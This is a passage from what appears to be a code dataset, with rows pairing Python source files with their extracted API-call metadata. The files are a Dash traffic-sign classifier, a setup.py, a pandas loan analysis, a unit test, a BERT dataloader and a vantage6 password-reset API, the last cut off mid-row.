'(max_length=100)\\n', (119, 135), False, 'from django.db import models\\n'), ((148, 183), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '\"\"\"pics\"\"\"'}), \"(upload_to='pics')\\n\", (165, 183), False, 'from django.db import models\\n'), ((197, 215), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\\n', (213, 215), False, 'from django.db import models\\n'), ((228, 249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\\n', (247, 249), False, 'from django.db import models\\n'), ((262, 296), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\\n', (281, 296), False, 'from django.db import models\\n')]"}}},{"rowIdx":748,"cells":{"code":{"kind":"string","value":"import base64\nimport io\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output\n\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\n\nfrom constants import CLASSES\n\nimport yaml \nwith open('app.yaml') as yaml_data :\n params = yaml.safe_load(yaml_data)\n \nIMAGE_WIDTH = params['IMAGE_WIDTH']\nIMAGE_HEIGHT = params['IMAGE_HEIGHT']\nPATH_MODEL = params['PATH_MODEL']\n\n\n# Load DNN model\nclassifier = tf.keras.models.load_model(PATH_MODEL)\n\ndef classify_image(image, model, image_box=None):\n \"\"\"Classify image by model\n\n Parameters\n ----------\n content: image content\n model: tf/keras classifier\n\n Returns\n -------\n class id returned by model classifier\n \"\"\"\n images_list = []\n image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box)\n # box argument clips image to (x1, y1, x2, y2)\n image = np.array(image)\n images_list.append(image)\n \n return model.predict_classes(np.array(images_list))\n\n\napp = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP])\n\n\npre_style = {\n 'whiteSpace': 'pre-wrap',\n 'wordBreak': 'break-all',\n 'whiteSpace': 'normal'\n}\n\n\n# Define application layout\n\n\nnavbar = dbc.NavbarSimple(\n children=[\n dbc.DropdownMenu(\n children=[\n dbc.DropdownMenuItem('Réseau de Neurones', header=True),\n dbc.DropdownMenuItem('SVM', href=\"#\"),\n ],\n nav=True,\n in_navbar=True,\n label='Modèle',\n ),\n ],\n brand=\"Menu\",\n brand_href=\"#\",\n color= \"#d90054\",\n dark=True\n)\n\ncards = html.Div( \n [\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Présentation\", className=\"card-title\"),\n html.P(\n [\n 'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\\'une image. L\\'application fonctionne de la manière suivante : vous déposer une image à l\\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.',\n ],\n className='card-text',\n ),\n ]\n ),\n className='w-75 mb-3', \n color='#f1cbd1', \n outline='Black', \n style={\n 'margin-top': '75px', \n 'margin-left': '185px'}, \n ),\n ]\n)\n\napp.layout = html.Div([\n html.Div([navbar]),\n \n html.Div(cards),\n dcc.Upload(\n id='bouton-chargement',\n children=html.Div([\n 'Cliquer-déposer ou ',\n html.A('sélectionner une image')\n ]),\n style={\n 'width': '50%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin-top': '75px',\n 'margin-left': '370px', \n }\n ),\n html.Div(id='mon-image'),\n html.Div(id='ma-zone-resultat')\n])\n\n@app.callback(Output('mon-image', 'children'),\n [Input('bouton-chargement', 'contents')])\ndef update_output(contents):\n if contents is not None:\n content_type, content_string = contents.split(',')\n if 'image' in content_type:\n image = Image.open(io.BytesIO(base64.b64decode(content_string)))\n predicted_class = classify_image(image, classifier)[0]\n return html.Div([\n html.Hr(style={'margin-top': '75px'}),\n html.Img(src=contents, style={'margin-left': '750px'}),\n html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),\n html.Hr(),\n #html.Div('Raw Content'),\n #html.Pre(contents, style=pre_style)\n ])\n else:\n try:\n # Décodage de l'image transmise en base 64 (cas des fichiers ppm)\n # fichier base 64 --> image PIL\n image = Image.open(io.BytesIO(base64.b64decode(content_string)))\n # image PIL --> conversion PNG --> buffer mémoire \n buffer = io.BytesIO()\n image.save(buffer, format='PNG')\n # buffer mémoire --> image base 64\n buffer.seek(0)\n img_bytes = buffer.read()\n content_string = base64.b64encode(img_bytes).decode('ascii')\n # Appel du modèle de classification\n predicted_class = classify_image(image, classifier)[0]\n # Affichage de l'image\n return html.Div([\n html.Hr(style={'margin-top': '75px'}),\n html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}),\n html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),\n html.Hr(),\n ])\n except:\n return html.Div([\n html.Hr(),\n html.Div('Uniquement des images svp : {}'.format(content_type)),\n html.Hr(), \n html.Div('Raw Content'),\n html.Pre(contents, style=pre_style)\n ])\n \n\n# Manage interactions with callbacks\n@app.callback(\n Output(component_id='ma-zone-resultat', component_property='children'),\n [Input(component_id='mon-champ-texte', component_property='value')]\n)\ndef update_output_div(input_value):\n return html.H3('Valeur saisie ici \"{}\"'.format(input_value))\n\n\n# Start the application\nif __name__ == '__main__':\n app.run_server(debug=True)"},"apis":{"kind":"list like","value":["dash_bootstrap_components.DropdownMenuItem","dash.dependencies.Output","base64.b64encode","io.BytesIO","dash_html_components.H5","base64.b64decode","dash.dependencies.Input","dash_html_components.Pre","yaml.safe_load","numpy.array","dash_html_components.Div","tensorflow.keras.models.load_model","dash_html_components.Img","dash_html_components.Hr","dash_html_components.P","dash.Dash","dash_html_components.A"],"string":"[\n \"dash_bootstrap_components.DropdownMenuItem\",\n \"dash.dependencies.Output\",\n \"base64.b64encode\",\n \"io.BytesIO\",\n \"dash_html_components.H5\",\n \"base64.b64decode\",\n \"dash.dependencies.Input\",\n \"dash_html_components.Pre\",\n \"yaml.safe_load\",\n \"numpy.array\",\n \"dash_html_components.Div\",\n \"tensorflow.keras.models.load_model\",\n \"dash_html_components.Img\",\n \"dash_html_components.Hr\",\n \"dash_html_components.P\",\n \"dash.Dash\",\n \"dash_html_components.A\"\n]"},"extract_api":{"kind":"string","value":"[((524, 562), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['PATH_MODEL'], {}), '(PATH_MODEL)\\n', (550, 562), True, 'import tensorflow as tf\\n'), ((1083, 1171), 'dash.Dash', 'dash.Dash', (['\"\"\"Traffic Signs Recognition\"\"\"'], {'external_stylesheets': '[dbc.themes.BOOTSTRAP]'}), \"('Traffic Signs Recognition', external_stylesheets=[dbc.themes.\\n BOOTSTRAP])\\n\", (1092, 1171), False, 'import dash\\n'), ((353, 378), 'yaml.safe_load', 'yaml.safe_load', (['yaml_data'], {}), '(yaml_data)\\n', (367, 378), False, 'import yaml\\n'), ((974, 989), 'numpy.array', 'np.array', (['image'], {}), '(image)\\n', (982, 989), True, 'import numpy as np\\n'), ((3345, 3376), 'dash.dependencies.Output', 'Output', (['\"\"\"mon-image\"\"\"', '\"\"\"children\"\"\"'], {}), \"('mon-image', 'children')\\n\", (3351, 3376), False, 'from dash.dependencies import Input, Output\\n'), ((5671, 5741), 'dash.dependencies.Output', 'Output', ([], {'component_id': '\"\"\"ma-zone-resultat\"\"\"', 'component_property': '\"\"\"children\"\"\"'}), \"(component_id='ma-zone-resultat', component_property='children')\\n\", (5677, 5741), False, 'from dash.dependencies import Input, Output\\n'), ((1052, 1073), 'numpy.array', 'np.array', (['images_list'], {}), '(images_list)\\n', (1060, 1073), True, 'import numpy as np\\n'), ((2702, 2720), 'dash_html_components.Div', 'html.Div', (['[navbar]'], {}), '([navbar])\\n', (2710, 2720), True, 'import dash_html_components as html\\n'), ((2731, 2746), 'dash_html_components.Div', 'html.Div', (['cards'], {}), '(cards)\\n', (2739, 2746), True, 'import dash_html_components as html\\n'), ((3265, 3289), 'dash_html_components.Div', 'html.Div', ([], {'id': '\"\"\"mon-image\"\"\"'}), \"(id='mon-image')\\n\", (3273, 3289), True, 'import dash_html_components as html\\n'), ((3295, 3326), 'dash_html_components.Div', 'html.Div', ([], {'id': '\"\"\"ma-zone-resultat\"\"\"'}), \"(id='ma-zone-resultat')\\n\", (3303, 3326), True, 'import dash_html_components as html\\n'), ((3393, 3431), 'dash.dependencies.Input', 'Input', (['\"\"\"bouton-chargement\"\"\"', '\"\"\"contents\"\"\"'], {}), \"('bouton-chargement', 'contents')\\n\", (3398, 3431), False, 'from dash.dependencies import Input, Output\\n'), ((5748, 5813), 'dash.dependencies.Input', 'Input', ([], {'component_id': '\"\"\"mon-champ-texte\"\"\"', 'component_property': '\"\"\"value\"\"\"'}), \"(component_id='mon-champ-texte', component_property='value')\\n\", (5753, 5813), False, 'from dash.dependencies import Input, Output\\n'), ((4471, 4483), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\\n', (4481, 4483), False, 'import io\\n'), ((1819, 1866), 'dash_html_components.H5', 'html.H5', (['\"\"\"Présentation\"\"\"'], {'className': '\"\"\"card-title\"\"\"'}), \"('Présentation', className='card-title')\\n\", (1826, 1866), True, 'import dash_html_components as html\\n'), ((1888, 2301), 'dash_html_components.P', 'html.P', (['[\"Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\\'une image. L\\'application fonctionne de la manière suivante : vous déposer une image à l\\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.\"\\n ]'], {'className': '\"\"\"card-text\"\"\"'}), '([\\n \"Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\\'une image. L\\'application fonctionne de la manière suivante : vous déposer une image à l\\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.\"\\n ], className=\\'card-text\\')\\n', (1894, 2301), True, 'import dash_html_components as html\\n'), ((3629, 3661), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\\n', (3645, 3661), False, 'import base64\\n'), ((3777, 3814), 'dash_html_components.Hr', 'html.Hr', ([], {'style': \"{'margin-top': '75px'}\"}), \"(style={'margin-top': '75px'})\\n\", (3784, 3814), True, 'import dash_html_components as html\\n'), ((3832, 3886), 'dash_html_components.Img', 'html.Img', ([], {'src': 'contents', 'style': \"{'margin-left': '750px'}\"}), \"(src=contents, style={'margin-left': '750px'})\\n\", (3840, 3886), True, 'import dash_html_components as html\\n'), ((4016, 4025), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (4023, 4025), True, 'import dash_html_components as html\\n'), ((1411, 1466), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['\"\"\"Réseau de Neurones\"\"\"'], {'header': '(True)'}), \"('Réseau de Neurones', header=True)\\n\", (1431, 1466), True, 'import dash_bootstrap_components as dbc\\n'), ((1484, 1521), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['\"\"\"SVM\"\"\"'], {'href': '\"\"\"#\"\"\"'}), \"('SVM', href='#')\\n\", (1504, 1521), True, 'import dash_bootstrap_components as dbc\\n'), ((2879, 2911), 'dash_html_components.A', 'html.A', (['\"\"\"sélectionner une image\"\"\"'], {}), \"('sélectionner une image')\\n\", (2885, 2911), True, 'import dash_html_components as html\\n'), ((4344, 4376), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\\n', (4360, 4376), False, 'import base64\\n'), ((4690, 4717), 'base64.b64encode', 'base64.b64encode', (['img_bytes'], {}), '(img_bytes)\\n', (4706, 4717), False, 'import base64\\n'), ((4950, 4987), 'dash_html_components.Hr', 'html.Hr', ([], {'style': \"{'margin-top': '75px'}\"}), \"(style={'margin-top': '75px'})\\n\", (4957, 4987), True, 'import dash_html_components as html\\n'), ((5009, 5101), 'dash_html_components.Img', 'html.Img', ([], {'src': \"('data:image/png;base64,' + content_string)\", 'style': \"{'margin-left': '750px'}\"}), \"(src='data:image/png;base64,' + content_string, style={\\n 'margin-left': '750px'})\\n\", (5017, 5101), True, 'import dash_html_components as html\\n'), ((5234, 5243), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (5241, 5243), True, 'import dash_html_components as html\\n'), ((5338, 5347), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (5345, 5347), True, 'import dash_html_components as html\\n'), ((5454, 5463), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (5461, 5463), True, 'import dash_html_components as html\\n'), ((5501, 5524), 'dash_html_components.Div', 'html.Div', (['\"\"\"Raw Content\"\"\"'], {}), \"('Raw Content')\\n\", (5509, 5524), True, 'import dash_html_components as html\\n'), ((5546, 5581), 'dash_html_components.Pre', 'html.Pre', (['contents'], {'style': 'pre_style'}), '(contents, style=pre_style)\\n', (5554, 5581), True, 'import dash_html_components as html\\n')]"}}},{"rowIdx":749,"cells":{"code":{"kind":"string","value":"# Copyright 2021 Northern.tech AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport setuptools\nimport re\n\nVERSIONFILE = \"src/mender/_version.py\"\nversion_string_line = open(VERSIONFILE, \"rt\").read()\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmatch = re.search(VSRE, version_string_line, re.M)\nif match:\n version_string = match.group(1)\nelse:\n raise RuntimeError(\"Unable to find version string in %s.\" % (VERSIONFILE,))\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"mender-python-client-mendersoftware\",\n version=version_string,\n license=\"Apache 2.0\",\n author=\"Mendersoftware\",\n author_email=\"\",\n description=\"A Python implementation of the Mender client interface\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mendersoftware/mender-python-client\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=[\"mender\", \"OTA\", \"updater\"],\n packages=setuptools.find_packages(where=\"src\"),\n install_requires=[\"cryptography\", \"requests\", \"msgpack\", \"websockets\"],\n entry_points={\"console_scripts\": [\"mender-python-client=mender.mender:main\"]},\n package_dir={\"\": \"src\"},\n python_requires=\">=3.6\",\n zip_safe=False,\n include_package_data=True,\n)\n"},"apis":{"kind":"list like","value":["setuptools.find_packages","re.search"],"string":"[\n \"setuptools.find_packages\",\n \"re.search\"\n]"},"extract_api":{"kind":"string","value":"[((781, 823), 're.search', 're.search', (['VSRE', 'version_string_line', 're.M'], {}), '(VSRE, version_string_line, re.M)\\n', (790, 823), False, 'import re\\n'), ((1687, 1724), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'where': '\"\"\"src\"\"\"'}), \"(where='src')\\n\", (1711, 1724), False, 'import setuptools\\n')]"}}},{"rowIdx":750,"cells":{"code":{"kind":"string","value":"# --------------\n# Importing header files\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.stats import mode \r\n\r\n\r\n\r\n\r\n# code starts here\r\nbank = pd.read_csv(path)\r\ncategorical_var = bank.select_dtypes(include = 'object')\r\nprint(categorical_var)\r\nnumerical_var = bank.select_dtypes(include = 'number')\r\nprint(numerical_var)\r\n\r\n\r\nbanks = bank.drop(columns=['Loan_ID'])\r\nbank_mode = banks.mode()\r\nbanks = banks.fillna(bank_mode.iloc[0])\r\nprint(banks.isnull().sum())\r\n\r\navg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'], values='LoanAmount', aggfunc = 'mean')\r\nprint(avg_loan_amount)\r\n\r\nloan_approved_se = banks[ (banks['Self_Employed'] == \"Yes\") & (banks['Loan_Status'] == \"Y\") ]\r\nloan_approved_nse = banks[ (banks['Self_Employed'] == \"No\") & (banks['Loan_Status'] == \"Y\") ]\r\n\r\npercentage_se = (len(loan_approved_se) / 614) * 100\r\npercentage_nse = (len(loan_approved_nse) / 614) * 100\r\n\r\n# loan amount term \r\n\r\nloan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x)/12 )\r\n\r\n\r\nbig_loan_term=len(loan_term[loan_term>=25])\r\n\r\nprint(big_loan_term)\r\n\r\n\r\ncolumns_to_show = ['ApplicantIncome', 'Credit_History']\r\n\r\nloan_groupby=banks.groupby(['Loan_Status'])[columns_to_show]\r\n\r\n# Check the mean value \r\nmean_values=loan_groupby.agg([np.mean])\r\n\r\nprint(mean_values)\r\n\r\n# code ends here\r\n\n\n\n"},"apis":{"kind":"list like","value":["pandas.pivot_table","pandas.read_csv"],"string":"[\n \"pandas.pivot_table\",\n \"pandas.read_csv\"\n]"},"extract_api":{"kind":"string","value":"[((150, 167), 'pandas.read_csv', 'pd.read_csv', (['path'], {}), '(path)\\n', (161, 167), True, 'import pandas as pd\\n'), ((489, 598), 'pandas.pivot_table', 'pd.pivot_table', (['banks'], {'index': \"['Gender', 'Married', 'Self_Employed']\", 'values': '\"\"\"LoanAmount\"\"\"', 'aggfunc': '\"\"\"mean\"\"\"'}), \"(banks, index=['Gender', 'Married', 'Self_Employed'], values=\\n 'LoanAmount', aggfunc='mean')\\n\", (503, 598), True, 'import pandas as pd\\n')]"}}},{"rowIdx":751,"cells":{"code":{"kind":"string","value":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom easy2fa import cli\n\n\nclass TestCheckInput(TestCase):\n @patch('builtins.input')\n def test_default(self, mock_input):\n mock_input.return_value = ''\n self.assertEquals(cli.check_input('prompt', default='one'), 'one')\n mock_input.return_value = 'two'\n self.assertEquals(cli.check_input('prompt', default='one'), 'two')\n\n @patch('builtins.input')\n @patch('builtins.print')\n def test_assertions(self, mock_print, mock_input):\n def assertion(value):\n if value not in ['yes', 'no']:\n return 'use yes or no'\n\n mock_input.side_effect = ['input', '', 'no']\n self.assertEquals(cli.check_input('prompt', assertion=assertion),\n 'no')\n mock_print.assert_called_with('\\tInvalid input: use yes or no')\n"},"apis":{"kind":"list like","value":["easy2fa.cli.check_input","unittest.mock.patch"],"string":"[\n \"easy2fa.cli.check_input\",\n \"unittest.mock.patch\"\n]"},"extract_api":{"kind":"string","value":"[((126, 149), 'unittest.mock.patch', 'patch', (['\"\"\"builtins.input\"\"\"'], {}), \"('builtins.input')\\n\", (131, 149), False, 'from unittest.mock import patch\\n'), ((423, 446), 'unittest.mock.patch', 'patch', (['\"\"\"builtins.input\"\"\"'], {}), \"('builtins.input')\\n\", (428, 446), False, 'from unittest.mock import patch\\n'), ((452, 475), 'unittest.mock.patch', 'patch', (['\"\"\"builtins.print\"\"\"'], {}), \"('builtins.print')\\n\", (457, 475), False, 'from unittest.mock import patch\\n'), ((253, 293), 'easy2fa.cli.check_input', 'cli.check_input', (['\"\"\"prompt\"\"\"'], {'default': '\"\"\"one\"\"\"'}), \"('prompt', default='one')\\n\", (268, 293), False, 'from easy2fa import cli\\n'), ((368, 408), 'easy2fa.cli.check_input', 'cli.check_input', (['\"\"\"prompt\"\"\"'], {'default': '\"\"\"one\"\"\"'}), \"('prompt', default='one')\\n\", (383, 408), False, 'from easy2fa import cli\\n'), ((723, 769), 'easy2fa.cli.check_input', 'cli.check_input', (['\"\"\"prompt\"\"\"'], {'assertion': 'assertion'}), \"('prompt', assertion=assertion)\\n\", (738, 769), False, 'from easy2fa import cli\\n')]"}}},{"rowIdx":752,"cells":{"code":{"kind":"string","value":"from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\r\n\r\nfrom bert_finetuning.data import GermanData\r\n\r\n\r\nclass GermanDataLoader:\r\n def __init__(\r\n self,\r\n data_paths,\r\n model_name,\r\n do_cleansing,\r\n max_sequence_length,\r\n batch_size=8,\r\n dataset_cls=GermanData,\r\n ):\r\n self.german_data = dataset_cls(\r\n data_paths,\r\n model_name,\r\n max_sequence_length=max_sequence_length,\r\n do_cleansing=do_cleansing,\r\n )\r\n self.batch_size = batch_size\r\n self.create_loaders()\r\n\r\n def create_loaders(self):\r\n \"\"\"\r\n Create Torch dataloaders for data splits\r\n \"\"\"\r\n self.german_data.text_to_tensors()\r\n print(\"creating dataloaders\")\r\n train_data = TensorDataset(\r\n self.german_data.train_inputs,\r\n self.german_data.train_masks,\r\n self.german_data.train_labels,\r\n )\r\n train_sampler = RandomSampler(train_data)\r\n self.train_dataloader = DataLoader(\r\n train_data, sampler=train_sampler, batch_size=self.batch_size\r\n )\r\n\r\n validation_data = TensorDataset(\r\n self.german_data.validation_inputs,\r\n self.german_data.validation_masks,\r\n self.german_data.validation_labels,\r\n )\r\n validation_sampler = SequentialSampler(validation_data)\r\n self.validation_dataloader = DataLoader(\r\n validation_data, sampler=validation_sampler, batch_size=self.batch_size\r\n )\r\n\r\n test_data = TensorDataset(\r\n self.german_data.test_inputs,\r\n self.german_data.test_masks,\r\n self.german_data.test_labels,\r\n )\r\n test_sampler = SequentialSampler(test_data)\r\n self.test_dataloader = DataLoader(\r\n test_data, sampler=test_sampler, batch_size=self.batch_size\r\n )\r\n print(\"finished creating dataloaders\")\r\n\r\n\r\n\"\"\"\r\n** FOR DEBUGGING **\r\n\r\nif __name__ == \"__main__\":\r\n ## define data paths\r\n germeval_data_paths = {\r\n \"train\": \"./datasets/hasoc_dataset/hasoc_german_train.csv\",\r\n \"dev\": \"./datasets/hasoc_dataset/hasoc_german_validation.csv\",\r\n \"test\": \"./datasets/hasoc_dataset/hasoc_german_test.csv\",\r\n }\r\n\r\n hasoc_german_data_paths = {\r\n \"train\": \"./datasets/hasoc_dataset/hasoc_german_train.csv\",\r\n \"dev\": \"./datasets/hasoc_dataset/hasoc_german_validation.csv\",\r\n \"test\": \"./datasets/hasoc_dataset/hasoc_german_test.csv\",\r\n }\r\n\r\n ## create dataloaders\r\n\r\n print(\"creating germeval dataloaders...\")\r\n germ_eval_dataloader = GermanDataLoader(germeval_data_paths)\r\n\r\n print(\"creating hasoc dataloaders...\")\r\n hasoc_german_dataloader = GermanDataLoader(hasoc_german_data_paths)\r\n\r\n\"\"\"\r\n"},"apis":{"kind":"list like","value":["torch.utils.data.RandomSampler","torch.utils.data.SequentialSampler","torch.utils.data.TensorDataset","torch.utils.data.DataLoader"],"string":"[\n \"torch.utils.data.RandomSampler\",\n \"torch.utils.data.SequentialSampler\",\n \"torch.utils.data.TensorDataset\",\n \"torch.utils.data.DataLoader\"\n]"},"extract_api":{"kind":"string","value":"[((837, 946), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.train_inputs', 'self.german_data.train_masks', 'self.german_data.train_labels'], {}), '(self.german_data.train_inputs, self.german_data.train_masks,\\n self.german_data.train_labels)\\n', (850, 946), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1019, 1044), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\\n', (1032, 1044), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1078, 1151), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 'train_sampler', 'batch_size': 'self.batch_size'}), '(train_data, sampler=train_sampler, batch_size=self.batch_size)\\n', (1088, 1151), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1205, 1330), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.validation_inputs', 'self.german_data.validation_masks', 'self.german_data.validation_labels'], {}), '(self.german_data.validation_inputs, self.german_data.\\n validation_masks, self.german_data.validation_labels)\\n', (1218, 1330), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1407, 1441), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['validation_data'], {}), '(validation_data)\\n', (1424, 1441), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1480, 1568), 'torch.utils.data.DataLoader', 'DataLoader', (['validation_data'], {'sampler': 'validation_sampler', 'batch_size': 'self.batch_size'}), '(validation_data, sampler=validation_sampler, batch_size=self.\\n batch_size)\\n', (1490, 1568), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1611, 1717), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.test_inputs', 'self.german_data.test_masks', 'self.german_data.test_labels'], {}), '(self.german_data.test_inputs, self.german_data.test_masks,\\n self.german_data.test_labels)\\n', (1624, 1717), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1789, 1817), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['test_data'], {}), '(test_data)\\n', (1806, 1817), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1850, 1921), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'sampler': 'test_sampler', 'batch_size': 'self.batch_size'}), '(test_data, sampler=test_sampler, batch_size=self.batch_size)\\n', (1860, 1921), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n')]"}}},{"rowIdx":753,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\nimport logging\nimport datetime\n\nfrom flask import request, render_template\nfrom flask_jwt_extended import (\n create_access_token,\n decode_token\n)\nfrom jwt.exceptions import DecodeError\nfrom flasgger import swag_from\nfrom http import HTTPStatus\nfrom pathlib import Path\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom vantage6.common import logger_name\nfrom vantage6.server import db\nfrom vantage6.server.resource import (\n ServicesResources\n)\n\nmodule_name = logger_name(__name__)\nlog = logging.getLogger(module_name)\n\n\ndef setup(api, api_base, services):\n\n path = \"/\".join([api_base, module_name])\n log.info(f'Setting up \"{path}\" and subdirectories')\n\n api.add_resource(\n ResetPassword,\n path+'/reset',\n endpoint=\"reset_password\",\n methods=('POST',),\n resource_class_kwargs=services\n )\n\n api.add_resource(\n RecoverPassword,\n path+'/lost',\n endpoint='recover_password',\n methods=('POST',),\n resource_class_kwargs=services\n )\n\n\n# ------------------------------------------------------------------------------\n# Resources / API's\n# ------------------------------------------------------------------------------\nclass ResetPassword(ServicesResources):\n \"\"\"user can use recover token to reset their password.\"\"\"\n\n @swag_from(str(Path(r\"swagger/post_reset_password.yaml\")),\n endpoint='reset_password')\n def post(self):\n \"\"\"\"submit email-adress receive token.\"\"\"\n\n # retrieve user based on email or username\n body = request.get_json()\n reset_token = body.get(\"reset_token\")\n password = body.get(\"password\")\n\n if not reset_token or not password:\n return {\"msg\": \"reset token and/or password is missing!\"}, \\\n HTTPStatus.BAD_REQUEST\n\n # obtain user\n try:\n user_id = decode_token(reset_token)['identity'].get('id')\n except DecodeError:\n return {\"msg\": \"Invalid recovery token!\"}, HTTPStatus.BAD_REQUEST\n\n log.debug(user_id)\n user = db.User.get(user_id)\n\n # set password\n user.set_password(password)\n user.save()\n\n log.info(f\"Successfull password reset for '{user.username}'\")\n return {\"msg\": \"password successfully been reset!\"}, \\\n HTTPStatus.OK\n\n\nclass RecoverPassword(ServicesResources):\n \"\"\"send a mail containing a recover token\"\"\"\n\n @swag_from(str(Path(r\"swagger/post_recover_password.yaml\")),\n endpoint='recover_password')\n def post(self):\n \"\"\"username or email generates a token which is mailed.\"\"\"\n\n # default return string\n ret = {\"msg\": \"If the username or email is our database you \"\n \"will soon receive an email\"}\n\n # obtain username/email from request'\n body = request.get_json()\n username = body.get(\"username\")\n email = body.get(\"email\")\n if not (email or username):\n return {\"msg\": \"No username or email provided!\"}, \\\n HTTPStatus.BAD_REQUEST\n\n # find user in the database, if not here we stop!\n try:\n if username:\n user = db.User.get_by_username(username)\n else:\n user = db.User.get_by_email(email)\n except NoResultFound:\n # we do not tell them.... But we won't continue either\n return ret\n\n log.info(f\"Password reset requested for '{user.username}'\")\n\n # generate a token that can reset their password\n expires = datetime.timedelta(hours=1)\n reset_token = create_access_token(\n {\"id\": str(user.id)}, expires_delta=expires\n )\n\n self.mail.send_email(\n \"password reset\",\n sender=\"\",\n recipients=[user.email],\n text_body=render_template(\"mail/reset_password_token.txt\",\n token=reset_token),\n html_body=render_template(\"mail/reset_password_token.html\",\n token=reset_token)\n )\n\n return ret\n"},"apis":{"kind":"list like","value":["logging.getLogger","flask.render_template","vantage6.server.db.User.get","vantage6.server.db.User.get_by_email","pathlib.Path","vantage6.server.db.User.get_by_username","flask_jwt_extended.decode_token","flask.request.get_json","vantage6.common.logger_name","datetime.timedelta"],"string":"[\n \"logging.getLogger\",\n \"flask.render_template\",\n \"vantage6.server.db.User.get\",\n \"vantage6.server.db.User.get_by_email\",\n \"pathlib.Path\",\n \"vantage6.server.db.User.get_by_username\",\n \"flask_jwt_extended.decode_token\",\n \"flask.request.get_json\",\n \"vantage6.common.logger_name\",\n \"datetime.timedelta\"\n]"},"extract_api":{"kind":"string","value":"[((494, 515), 'vantage6.common.logger_name', 'logger_name', (['__name__'], {}), '(__name__)\\n', (505, 515), False, 'from vantage6.common import logger_name\\n'), ((522, 552), 'logging.getLogger', 'logging.getLogger', (['module_name'], {}), '(module_name)\\n', (539, 552), False, 'import logging\\n'), ((1577, 1595), 'flask.request.get_json', 'request.get_json', ([], {}), '()\\n', (1593, 1595), False, 'from flask import request, render_template\\n'), ((2094, 2114), 'vantage6.server.db.User.get', 'db.User.get', 